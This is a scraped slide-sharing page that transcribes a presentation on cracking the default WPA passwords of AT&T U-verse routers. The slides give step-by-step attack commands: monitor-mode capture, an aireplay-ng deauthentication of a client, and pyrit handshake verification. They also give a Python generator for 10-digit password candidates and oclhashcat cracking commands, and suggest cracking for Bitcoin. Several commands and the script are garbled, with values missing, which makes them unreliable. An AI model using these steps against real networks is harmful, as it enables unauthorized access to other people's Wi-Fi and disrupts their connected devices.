Presentation is loading. Please wait.

Presentation is loading. Please wait.

Cracking AT&T U-verse Default WPA1/2 Passwords. by Jason Wheeler Awesome blog: E.

Similar presentations


Presentation on theme: "Cracking AT&T U-verse Default WPA1/2 Passwords. by Jason Wheeler Awesome blog: E."— Presentation transcript:

1 Cracking AT&T U-verse Default WPA1/2 Passwords. by Jason Wheeler Awesome blog: E

2 Getting the Handshake

3 Aircrack's site has a pretty good tutorial.tutorial. Boot from Back Track 5 R3 First you want to see what kind of wifi connection you have to choose from. Start your wireless interface in monitor mode. #airmon-zc start wlan0 #airodump-ng --encrypt wpa mon0

4

5 #airmon-zc stop mon0 Start airmon-zc on the channel of the target. #airmon-zc start wlan0 Then start airodump on the same channel along with some other options. #airodump-ng mon0 --encrypt wpa --write --output-format pcap -a --channel

6 Deauthenticate a client #aireplay-ng a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0 Where: -0 means deauthentication 5 is the number of deauths to send -a 00:14:6C:7E:40:80 is the MAC address of the access point -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing mon0 is the interface name

7 WPA Handshake

8 Verify 4-way Handshake

9

10 PMK = PBKDF2(passphrase, ssid, ssidLength, 4096, 256) The PTK is a keyed-HMAC function using the PMK on the two MAC addresses and the two nonces from the first two packets of the 4-Way Handshake.

11

12

13

14

15

16 Verify 4-way Handshake The easy way #pyrit -r.pcap analyze

17

18

19 Strip out the junk. #pyrit -r.pcap -o OUTPUT.pcap strip

20 CAP-2-HCCAP To turn your pcap file into a hashcat-plus friendly file you can upload it to https://hashcat.net/cap2hccap/https://hashcat.net/cap2hccap/

21 CRACK!!

22 Python Script import sys MAX_INT = BAD_PATTERNS = {x * 3 for x in ' '} for number in xrange(MAX_INT): int_string = str(number).rjust(10, '0') if any(pattern in int_string for pattern in BAD_PATTERNS): continue print ( int_string )

23 Hashcat-plus $python 2wire.py |./oclhashcat-plus64.bin -m a 0.hccap --gpu-accel=160 --gpu-loops= ,770 c/s real or $./oclhashcat-plus64.bin -m a 3.hccap --gpu- accel=160 --gpu-loops= ?d ?1?1?1?1?1?1?1?1?1?1 114K c/s real

24 Crack for Bitcoin.

25 sources Fi+Security/Chapter+10.+WPA+and+RSN+Key+Hierarchy/


Download ppt "Cracking AT&T U-verse Default WPA1/2 Passwords. by Jason Wheeler Awesome blog: E."

Similar presentations


Ads by Google